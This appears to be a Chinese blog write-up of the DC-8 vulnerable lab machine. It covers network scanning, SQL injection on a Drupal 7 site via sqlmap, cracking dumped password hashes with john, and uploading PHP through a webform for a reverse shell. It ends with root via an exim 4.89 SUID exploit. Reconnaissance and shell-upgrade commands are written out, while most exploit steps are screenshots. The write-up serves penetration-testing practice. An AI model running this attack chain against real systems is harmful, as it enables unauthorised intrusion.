靶机-DC8

查找靶机IP

netdiscover -r 192.168.253.0/24

在这里插入图片描述

端口扫描

masscan 192.168.253.140 --ports 0-65535 --rate=10000

在这里插入图片描述

nmap扫描

nmap -T5 -A -p- 192.168.253.140

在这里插入图片描述

目录扫描

dirsearch -u 192.168.253.140

在这里插入图片描述

http://192.168.253.140/

在这里插入图片描述

指纹Drupal 7令人注意

在这里插入图片描述

一些文档

http://192.168.253.140/COPYRIGHT.txt

http://192.168.253.140/CHANGELOG.txt

http://192.168.253.140/INSTALL.pgsql.txt

http://192.168.253.140/INSTALL.mysql.txt

http://192.168.253.140/INSTALL.txt

http://192.168.253.140/LICENSE.txt

http://192.168.253.140/MAINTAINERS.txt

http://192.168.253.140/README.txt

http://192.168.253.140/UPGRADE.txt

http://192.168.253.140/sites/all/libraries/README.txt

禁止访问

http://192.168.253.140/includes/

http://192.168.253.140/misc/

http://192.168.253.140/modules/

http://192.168.253.140/profiles/

在这里插入图片描述

http://192.168.253.140/install.php

在这里插入图片描述

http://192.168.253.140/robots.txt

在这里插入图片描述

http://192.168.253.140/xmlrpc.php

在这里插入图片描述

http://192.168.253.140/?nid=1发现报错注入

sqlmap一把梭

在这里插入图片描述

利用john爆破密码


 admin | $S$D2tRcYRyqVFNSc0NvYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z |
 john  | $S$DqupvJbxVmqjr6cYePnx2A891ln7lsuku/3if/oRVZJaz5mKC2vF

在这里插入图片描述

用户: john 密码: turtle

ssh远程登录失败,发现需要使用公私钥登录

在这里插入图片描述

去主页登录

http://192.168.253.140/user/

在这里插入图片描述

在contact us >webform >form settings中发现可以上传php代码

在这里插入图片描述

在contact us留言反弹shell

在这里插入图片描述

python -c 'import pty;pty.spawn(“/bin/bash”)'交互shell界面

执行命令发现为www-data权限,查看下SUID权限的命令

find / -perm -u=s -type f 2>/dev/null查找

发现exim4命令,查看版本发现为exim 4.89

在这里插入图片描述

查找相关漏洞

在这里插入图片描述

查看脚本路径

在这里插入图片描述

下载到当前目录

在这里插入图片描述

查看用法

在这里插入图片描述

python -m http.server 8000

在这里插入图片描述

执行发现还是www

在这里插入图片描述

参考下面方法加参数尝试

在这里插入图片描述

用第一个不成功

在这里插入图片描述

改用第二个

在这里插入图片描述

成功获得root权限,找到flag

在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值